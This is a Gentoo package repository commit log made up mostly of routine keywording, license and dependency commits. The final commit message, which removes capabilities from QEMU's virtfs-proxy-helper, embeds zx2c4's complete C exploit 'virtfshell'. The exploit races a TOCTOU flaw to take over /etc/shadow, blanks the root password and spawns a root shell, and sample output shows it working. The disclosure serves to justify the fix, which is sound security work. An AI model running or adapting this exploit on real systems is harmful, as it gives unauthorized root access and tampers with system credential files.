| Commit message (Collapse) | Author | Age | Files | Lines |
|
|
|
| |
We'll handle compressing of files ourselves, so don't waste time on it.
|
|
|
|
|
|
| |
X-Gentoo-Bug: 567424
Package-Manager: portage-2.2.24
|
|
|
|
|
| |
Package-Manager: portage-2.2.20.1
Signed-off-by: Richard Yao <ryao@gentoo.org>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| |
Codeweavers made 2 changes between this and CROSSOVER-2, the latter of
which we requested:
1. They now claim to bundle copies of libxml2 and libxslt under
BSD-style licenses.
2. The section on deleting the software has been deleted.
This had 6 days on the list for comments and none were provided:
https://archives.gentoo.org/gentoo-dev/message/fd9e05bfe3401ce96dfaa9927f9ebcca
Signed-off-by: Richard Yao <ryao@gentoo.org>
|
|
|
|
|
| |
Package-Manager: portage-2.2.24
Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
|
|
|
|
|
|
|
| |
(ALLARCHES policy) wrt bug #567994
Package-Manager: portage-2.2.24
Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
|
|
|
|
|
|
| |
Package-Manager: portage-2.2.24
RepoMan-Options: --include-arches="x86"
Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
|
|
|
|
|
|
| |
Package-Manager: portage-2.2.24
RepoMan-Options: --include-arches="x86"
Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
|
|
|
|
|
|
| |
Package-Manager: portage-2.2.24
RepoMan-Options: --include-arches="x86"
Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
|
|
|
|
|
|
| |
Package-Manager: portage-2.2.24
RepoMan-Options: --include-arches="x86"
Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
|
|
|
|
|
|
| |
Package-Manager: portage-2.2.24
RepoMan-Options: --include-arches="x86"
Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
|
|
|
|
|
|
| |
Package-Manager: portage-2.2.24
RepoMan-Options: --include-arches="amd64"
Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
|
|
|
|
|
|
| |
Package-Manager: portage-2.2.24
RepoMan-Options: --include-arches="amd64"
Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
|
|\
| |
| |
| | |
Pull request: https://github.com/gentoo/gentoo/pull/469
|
| |
| |
| |
| |
| |
| |
| | |
mono-addins with "gtk" USE flag is enough to pull in every Mono
library needed by Pinta
Package-Manager: portage-2.2.24
|
| |
| |
| |
| | |
Signed-off-by: Brian Evans <grknight@gentoo.org>
|
| |
| |
| |
| | |
Package-Manager: portage-2.2.26
|
| |
| |
| |
| | |
Package-Manager: portage-2.2.26
|
| |
| |
| |
| | |
Package-Manager: portage-2.2.26
|
| |
| |
| |
| | |
Package-Manager: portage-2.2.26
|
| |
| |
| |
| | |
Package-Manager: portage-2.2.24
|
| |
| |
| |
| | |
Package-Manager: portage-2.2.26
|
| |
| |
| |
| |
| |
| | |
Package-Manager: portage-2.2.24
RepoMan-Options: --include-arches="amd64"
Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
|
| |
| |
| |
| |
| |
| | |
Package-Manager: portage-2.2.24
RepoMan-Options: --include-arches="amd64"
Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
|
| |
| |
| |
| |
| |
| | |
Package-Manager: portage-2.2.24
RepoMan-Options: --include-arches="amd64"
Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
|
| |
| |
| |
| |
| |
| | |
Package-Manager: portage-2.2.24
RepoMan-Options: --include-arches="amd64"
Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
|
| |
| |
| |
| |
| |
| | |
Package-Manager: portage-2.2.24
RepoMan-Options: --include-arches="amd64"
Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
|
| |
| |
| |
| |
| |
| | |
Package-Manager: portage-2.2.24
RepoMan-Options: --include-arches="amd64"
Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
|
| |
| |
| |
| |
| |
| | |
Package-Manager: portage-2.2.24
RepoMan-Options: --include-arches="amd64"
Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
|
| |
| |
| |
| |
| |
| | |
Package-Manager: portage-2.2.24
RepoMan-Options: --include-arches="amd64"
Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
|
| |
| |
| |
| |
| |
| | |
Package-Manager: portage-2.2.24
RepoMan-Options: --include-arches="amd64"
Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
|
| |
| |
| |
| |
| |
| | |
Package-Manager: portage-2.2.24
RepoMan-Options: --include-arches="amd64"
Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
|
| |
| |
| |
| |
| |
| | |
Package-Manager: portage-2.2.24
RepoMan-Options: --include-arches="amd64"
Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
|
| |
| |
| |
| |
| |
| | |
Package-Manager: portage-2.2.24
RepoMan-Options: --include-arches="amd64"
Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
|
| |
| |
| |
| |
| |
| | |
Package-Manager: portage-2.2.24
RepoMan-Options: --include-arches="amd64"
Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
|
| |
| |
| |
| |
| |
| | |
Package-Manager: portage-2.2.24
RepoMan-Options: --include-arches="amd64"
Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
|
| |
| |
| |
| |
| |
| | |
Package-Manager: portage-2.2.24
RepoMan-Options: --include-arches="amd64"
Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
|
| |
| |
| |
| |
| |
| | |
Package-Manager: portage-2.2.24
RepoMan-Options: --include-arches="amd64"
Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
|
| |
| |
| |
| |
| |
| | |
Package-Manager: portage-2.2.24
RepoMan-Options: --include-arches="amd64"
Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
|
| |
| |
| |
| |
| |
| | |
Package-Manager: portage-2.2.24
RepoMan-Options: --include-arches="amd64"
Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
|
| |
| |
| |
| |
| |
| | |
Package-Manager: portage-2.2.24
RepoMan-Options: --include-arches="amd64"
Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
|
| |
| |
| |
| | |
Package-Manager: portage-2.2.26
|
| |
| |
| |
| | |
Package-Manager: portage-2.2.26
|
| |
| |
| |
| | |
Package-Manager: portage-2.2.26
|
| |
| |
| |
| |
| |
| |
| | |
See also: https://bugs.gentoo.org/show_bug.cgi?id=566058
Tested-by: Vadim
Package-Manager: portage-2.2.24
|
| |
| |
| |
| | |
Package-Manager: portage-2.2.26
|
| |
| |
| |
| |
| |
| |
| | |
to version 1.2.1 as reuqested in bug #568224
Package-Manager: portage-2.2.26
Signed-off-by: Lars Wendler <polynomial-c@gentoo.org>
|
| |
| |
| |
| |
| | |
Package-Manager: portage-2.2.26
Signed-off-by: Lars Wendler <polynomial-c@gentoo.org>
|
| |
| |
| |
| | |
Package-Manager: portage-2.2.24
|
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| | |
The virtfs-proxy-helper program is not a safe binary to give caps.
The following exploit code demonstrates the vulnerability:
~=~=~=~= snip ~=~=~=~=
/* == virtfshell ==
*
* Some distributions make virtfs-proxy-helper from QEMU either SUID or
* give it CAP_CHOWN fs capabilities. This is a terrible idea. While
* virtfs-proxy-helper makes some sort of flimsy check to make sure
* its socket path doesn't already exist, it is vulnerable to TOCTOU.
*
* This should spawn a root shell eventually on vulnerable systems.
*
* - zx2c4
* 2015-12-12
*
*
* zx2c4@thinkpad ~ $ lsb_release -i
* Distributor ID: Gentoo
* zx2c4@thinkpad ~ $ ./virtfshell
* == Virtfshell - by zx2c4 ==
* [+] Beginning race loop
* [+] Chown'd /etc/shadow, elevating to root
* [+] Cleaning up
* [+] Spawning root shell
* thinkpad zx2c4 # whoami
* root
*
*/
#include <stdio.h>
#include <sys/wait.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/inotify.h>
#include <unistd.h>
#include <stdlib.h>
#include <signal.h>
static int it_worked(void)
{
struct stat sbuf = { 0 };
stat("/etc/shadow", &sbuf);
return sbuf.st_uid == getuid() && sbuf.st_gid == getgid();
}
int main(int argc, char **argv)
{
int fd;
pid_t pid;
char uid[12], gid[12];
sprintf(uid, "%d", getuid());
sprintf(gid, "%d", getgid());
printf("== Virtfshell - by zx2c4 ==\n");
printf("[+] Beginning race loop\n");
while (!it_worked()) {
fd = inotify_init();
unlink("/tmp/virtfshell/sock");
mkdir("/tmp/virtfshell", 0777);
inotify_add_watch(fd, "/tmp/virtfshell", IN_CREATE);
pid = fork();
if (!pid) {
close(0);
close(1);
close(2);
execlp("virtfs-proxy-helper", "virtfs-proxy-helper", "-n", "-p", "/tmp", "-u", uid, "-g", gid, "-s", "/tmp/virtfshell/sock", NULL);
_exit(1);
}
read(fd, 0, 0);
unlink("/tmp/virtfshell/sock");
symlink("/etc/shadow", "/tmp/virtfshell/sock");
close(fd);
kill(pid, SIGKILL);
wait(NULL);
}
printf("[+] Chown'd /etc/shadow, elevating to root\n");
system( "cp /etc/shadow /tmp/original_shadow;"
"sed 's/^root:.*/root::::::::/' /etc/shadow > /tmp/modified_shadow;"
"cat /tmp/modified_shadow > /etc/shadow;"
"su -c '"
" echo [+] Cleaning up;"
" cat /tmp/original_shadow > /etc/shadow;"
" chown root:root /etc/shadow;"
" rm /tmp/modified_shadow /tmp/original_shadow;"
" echo [+] Spawning root shell;"
" exec /bin/bash -i"
"'");
return 0;
}
|